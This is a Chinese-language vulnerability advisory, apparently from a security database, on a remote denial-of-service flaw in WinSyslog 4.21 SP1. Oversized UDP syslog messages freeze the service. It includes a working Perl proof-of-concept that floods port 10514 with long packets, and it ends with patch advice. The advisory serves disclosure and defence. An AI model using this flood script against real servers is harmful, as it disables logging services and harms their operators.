WinSyslog超长Syslog消息远程拒绝服务攻击漏洞
发布日期:2003-10-14
更新日期:2003-10-21
受影响系统:WinSyslog WinSyslog 4.21 SP1
描述:
BUGTRAQ ID:
8821
WinSyslog是一款用于Windows的syslog日志服务程序。
WinSyslog没有正确处理超长syslog消息,远程攻击者可以利用这个漏洞对日志服务器进行拒绝服务攻击。
当程序通过监听端口(默认是10514/UDP)接收到多个超长syslog消息,可导致WinSyslog程序停止响应。
<*来源:storm (
storm@stormdev.net)
链接:
http://www.securiteam.com/windowsntfocus/6L00F158KE.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
storm (
storm@stormdev.net)提供了如下测试方法:
#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability
use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
for ($count = 0; $count < 1000; $count ++)
{
$buf = "<00>";
$buf .= "A"x((600+$count)*4);
print "Length: ", length($buf), "\n";
send($socket, $buf, 0, $portaddr);
print "sent\n";
}
print "Done\n";
建议:
厂商补丁:
WinSyslog
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.winsyslog.com/en/浏览次数:3412
严重程度:0(网友投票)
